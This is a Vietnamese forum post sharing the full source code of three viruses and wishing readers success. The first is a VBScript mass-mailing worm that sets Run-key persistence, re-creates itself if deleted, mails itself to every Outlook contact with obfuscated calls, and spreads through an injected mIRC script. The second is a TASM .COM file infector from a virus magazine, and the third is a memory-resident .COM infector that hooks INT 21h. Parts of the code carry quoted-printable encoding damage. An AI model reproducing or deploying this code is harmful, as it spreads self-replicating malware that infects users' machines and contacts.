MÃ NGUỒN CỦA VIRUS HOME PAGE
'Homepage Created By Robinhood
Set FSO =3D createobject("scripting.filesystemobject")
dirsystem =3D FSO.getspecialfolder(1)
Path=3D dirsystem & "\Win32.dll.vbs"
Set WSH createobject("wscript.shell")
WSH.regwrite
"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Ru n\Win32dll",
"wscript.exe " & Path& " %"
FSO.copyfile wscript.scriptfullname, Path
payload=20
If =
WSH.regread("HKLM\SOFTWARE\Microsoft\Windows\Curre ntVersion\Homepage\Send
mail") <> 1 then
sendmail
End if
If
WSH.regread("HKLM\SOFTWARE\Microsoft\Windows\Curre ntVersion\Homepage\IRC"
) <> 1 then
IRC ""
End if
Set sourcefile=3D FSO.opentextfile(wscript.scriptfullname)
sourcetext sourcefile.readall
sourcefile.close
Do
if not(FSO.fileexists(wscript.scriptfullname)) then
set filebackup=3D FSO.createtextfile(wscript.scriptfullname)
filebackup.write sourcetext
filebackup.close
end if
sWSH.regread("HKLM\SOFTWARE\Microsoft\Windows\Curr entVersion\Run\Win32dll"
)
If s<> "wscript.exe " & Path& " %" then
WSH.regwrite =
"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Ru n\Win32dll", "wscript.exe " & Path& " %"
end if
s=3D ""
loop=20
Function sendmail()
Set myapp =3D CreateObject("Outlook.Application")
If myapp =3D "Outlook" Then
Set myname =3D myapp.GetNameSpace("MAPI")
Set myaddlists =3D myname.AddressLists
For Each myaddlist In myaddlists
If myaddlist.AddressEntries.Count <> 0 Then
x =3D myaddlist.AddressEntries.Count
For i =3D 1 To x
Set mailitem =3D myapp.CreateItem(0)
Set myadd =3D myaddlist.AddressEntries(i)
mailitem.To =3D myadd.Address
mailitem.Subject =3D "Very Important!"
mailitem.Body =3D "Hi:" & vbcrlf & "Please view this file, it's very
important." & vbcrlf & ""
execute "set myatts =3Dmailitem." & Chr(65) & Chr(116) & Chr(116) &
Chr(97) & Chr(99) & Chr(104) & Chr(109) & Chr(101) & Chr(110) & Chr(116)
& Chr(115)
copypath Path
mailitem.DeleteAfterSubmit True
myatts.Add copypath
If mailitem.To <> "" Then
mailitem.Send
End If
Next
End If
Next
End If
End function
Function IRC(ircpath)
If ircpath <> "" Then
programpath
WSH.regread("HKEY_LOCAL_MACHINE\Software\Microsoft \Windows\CurrentVersion
\ProgramFilesDir")
If FSO.fileexists("c:\mirc\mirc.ini") Then
ircpath =3D "c:\mirc"
ElseIf FSO.fileexists("c:\mirc32\mirc.ini") Then
ircpath =3D "c:\mirc32"
ElseIf FSO.fileexists(programpath & "\mirc\mirc.ini") Then
ircpath =3D programpath & "\mirc"
ElseIf FSO.fileexists(programpath & "\mirc32\mirc.ini") Then
ircpath =3D programpath & "\mirc"
Else
ircpath =3D ""
End If
End If
If ircpath <> "" Then
Set ircscript =3D FSO.CreateTextFile(ircpath & "\script.ini", True)
text =3D "[script]" & vbCrLf & "n0=3Don 1:JOIN:#:{"
text =3D text & vbCrLf & "n0=3Don 1:JOIN:#:{"
text =3D text & vbCrLf & "n1=3D /if ( $nick =3D=3D $me ) { halt }"
text =3D text & vbCrLf & "n2=3D /." & Chr(100) & Chr(99) & Chr(99) & "
send $nick "
text =3D text & Path
text =3D text & vbCrLf & "n3=3D}"
ircscript.write(text)
ircscript.Close
End If
End Function=20
Function payload()
Randomize
If 1 + Int(Rnd * 5) =3D 7 then
WSH.run "Http://www.virii.com.ar",false
end if
end function
Code:
; virus from ALT-11 mag
; ---------------------------------------
;
; Coded by: Azagoth
; ---------------------------------------
; Assemble using Turbo Assembler:
; tasm /m2 <filename>.asm
; tlink /t <filename>.obj
; ---------------------------------------------------------------------------
; - Non-Overwriting .COM infector (excluding COMMAND.COM)
; - COM growth: XXX bytes
; - It searches the current directory for uninfected files. If none are
; found, it searches previous directory until it reaches root and no more
; uninfected files are found. (One infection per run)
; - Also infects read-only files
; - Restores attributes, initial date/time-stamps, and original path.
; ---------------------------------------------------------------------------
.model tiny
.code
org 100h ; adjust for psp
start:
call get_disp ; push ip onto stack
get_disp:
pop bp ; bp holds current ip
sub bp, offset get_disp ; bp = code displacement
; original label offset is stored in machine code
; so new (ip) - original = displacement of code
save_path:
mov ah, 47h ; save cwd
xor dl, dl ; 0 = default drive
lea si, [bp + org_path]
int 21h
get_dta:
mov ah, 2fh
int 21h
mov [bp + old_dta_off], bx ; save old dta offset
set_dta: ; point to dta record
mov ah, 1ah
lea dx, [bp + dta_filler]
int 21h
search:
mov ah, 4eh ; find first file
mov cx, [bp + search_attrib] ; if successful dta is
lea dx, [bp + search_mask] ; created
int 21h
jnc clear_attrib ; if found, continue
find_next:
mov ah, 4fh ; find next file
int 21h
jnc clear_attrib
still_searching:
mov ah, 3bh
lea dx, [bp + previous_dir] ; cd ..
int 21h
jnc search
jmp bomb ; at root, no more files
clear_attrib:
mov ax, 4301h
xor cx, cx ; get rid of attributes
lea dx, [bp + dta_file_name]
int 21h
open_file:
mov ax, 3D02h ; AL=2 read/write
lea dx, [bp + dta_file_name]
int 21h
xchg bx, ax ; save file handle
; bx won't change from now on
check_if_command_com:
cld
lea di, [bp + com_com]
lea si, [bp + dta_file_name]
mov cx, 11 ; length of 'COMMAND.COM'
repe cmpsb ; repeat while equal
jne check_if_infected
jmp close_file
check_if_infected:
mov dx, word ptr [bp + dta_file_size] ; only use first word since
; COM file
sub dx, 2 ; file size - 2
mov ax, 4200h
mov cx, 0 ; cx:dx ptr to offset from
int 21h ; origin of move
mov ah, 3fh ; read last 2 characters
mov cx, 2
lea dx, [bp + last_chars]
int 21h
mov ah, [bp + last_chars]
cmp ah, [bp + virus_id]
jne save_3_bytes
mov ah, [bp + last_chars + 1]
cmp ah, [bp + virus_id + 1]
jne save_3_bytes
jmp close_file
save_3_bytes:
mov ax, 4200h ; 00=start of file
xor cx, cx
xor dx, dx
int 21h
mov ah, 3Fh
mov cx, 3
lea dx, [bp + _3_bytes]
int 21h
goto_eof:
mov ax, 4202h ; 02=End of file
xor cx, cx ; offset from origin of move
xor dx, dx ; (i.e. nowhere)
int 21h ; ax holds file size
; since it is a COM file, overflow will not occur
save_jmp_displacement:
sub ax, 3 ; file size - 3 = jmp disp.
mov [bp + jmp_disp], ax
write_code:
mov ah, 40h
mov cx, virus_length ;*** equate
lea dx, [bp + start]
int 21h
goto_bof:
mov ax, 4200h
xor cx, cx
xor dx, dx
int 21h
write_jmp: ; to file
mov ah, 40h
mov cx, 3
lea dx, [bp + jmp_code]
int 21h
inc [bp + infections]
restore_date_time:
mov ax, 5701h
mov cx, [bp + dta_file_time]
mov dx, [bp + dta_file_date]
int 21h
close_file:
mov ah, 3eh
int 21h
restore_attrib:
xor ch, ch
mov cl, [bp + dta_file_attrib] ; restore original attributes
mov ax, 4301h
lea dx, [bp + dta_file_name]
int 21h
done_infecting?:
mov ah, [bp + infections]
cmp ah, [bp + max_infections]
jz bomb
jmp find_next
bomb:
; cmp bp, 0
; je restore_path ; original run
;
;---- Stuff deleted
restore_path:
mov ah, 3bh ; when path stored
lea dx, [bp + root] ; '\' not included
int 21h
mov ah, 3bh ; cd to original path
lea dx, [bp + org_path]
int 21h
restore_dta:
mov ah, 1ah
mov dx, [bp + old_dta_off]
int 21h
restore_3_bytes: ; in memory
lea si, [bp + _3_bytes]
mov di, 100h
cld ; auto-inc si, di
mov cx, 3
rep movsb
return_control_or_exit?:
cmp bp, 0 ; bp = 0 if original run
je exit
mov di, 100h ; return control back to prog
jmp di ; -> cs:100h
exit:
mov ax, 4c00h
int 21h
;-------- Variable Declarations --------
old_dta_off dw 0 ; offset of old dta address
;-------- dta record
dta_filler db 21 dup (0)
dta_file_attrib db 0
dta_file_time dw 0
dta_file_date dw 0
dta_file_size dd 0
dta_file_name db 13 dup (0)
;--------
search_mask db '*.COM',0 ; files to infect: *.COM
search_attrib dw 00100111b ; all files a,s,h,r
com_com db 'COMMAND.COM'
previous_dir db '..',0
root db '\',0
org_path db 64 dup (0) ; original path
infections db 0 ; counter
max_infections db 1
_3_bytes db 0, 0, 0
jmp_code db 0E9h
jmp_disp dw 0
last_chars db 0, 0 ; do last chars = ID ?
virus_id db 'AZ'
eov: ; end of virus
virus_length equ offset eov - offset start
end start
Code:
VSize=085h
Code Segment
Assume CS:Code
org 0
db 4Dh
jmp Start
Org 600h
Bytes db 0CDh,20h,90h,90h
Start: mov si, 0100h
mov bx, offset Int21
mov cx, 0050h
mov di, si
add si, [si+2]
push di
movsw
movsw
mov es, cx
cmpsb
je StartFile
dec si
dec di
rep movsw
mov es, cx
xchg ax, bx
xchg ax, cx
Loop0: xchg ax, cx
xchg ax, word ptr es:[di-120h]
stosw
jcxz Loop0
xchg ax, bx
StartFile:
push ds
pop es
ret
Int21: cmp ax, 4B00h
jne End21
Exec: push ax
push bx
push dx
push ds
push es
mov ax, 3D02h
call DoInt21
jc EndExec
cbw ;Zero AH
cwd ;Zero DX
mov bx, si ;Move handle to BX
mov ds, ax ;Set DS and ES to 60h,
mov es, ax ;the virus data segment
mov ah, 3Fh ;Read first 4 bytes
int 69h
mov al, 4Dh
scasb ;Check for 4D5Ah or infected file mark
je Close ;.EXE or already infected
mov al, 2
call LSeek ;Seek to the end, SI now contains file size
mov cl, VSize ;Virus size in CX, prepare to write
int 69h ;AH is 40h, i.e. Write operation
mov ax, 0E94Dh ;Virus header in AX
stosw ;Store it
xchg ax, si ;Move file size in AX
stosw ;Complete JMP instruction
xchg ax, dx ;Zero AX
call LSeek ;Seek to the beginning
int 69h ;AH is 40h, write the virus header
Close: mov ah,3Eh ;Close the file
int 69h
EndExec: pop es
pop ds
pop dx
pop bx
pop ax
End21: jmp dword ptr cs:[69h * 4]
LSeek: mov ah, 42h ;Seek operation
cwd ;Zero DX
DoInt21: xor cx, cx ;External entry for Open, zero cx
int 69h
mov cl, 4 ;4 bytes will be read/written
xchg ax, si ;Store AX in SI
mov ax, 4060h ;Prepare AH for Write
xor di, di ;Zero DI
ret
VLen = $ - offset Bytes
Code EndS
End
; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ> and Remember Don't Forget to Call <ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
; ÄÄÄÄÄÄÄÄÄÄÄÄ> ARRESTED DEVELOPMENT +31.79.426o79 H/P/A/V/AV/? <ÄÄÄÄÄÄÄÄÄÄ
; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
Chúc các bạn thành công
Backdoor(VNISS)
Fri Nov 02, 2012 4:11 pm by esolutionvn
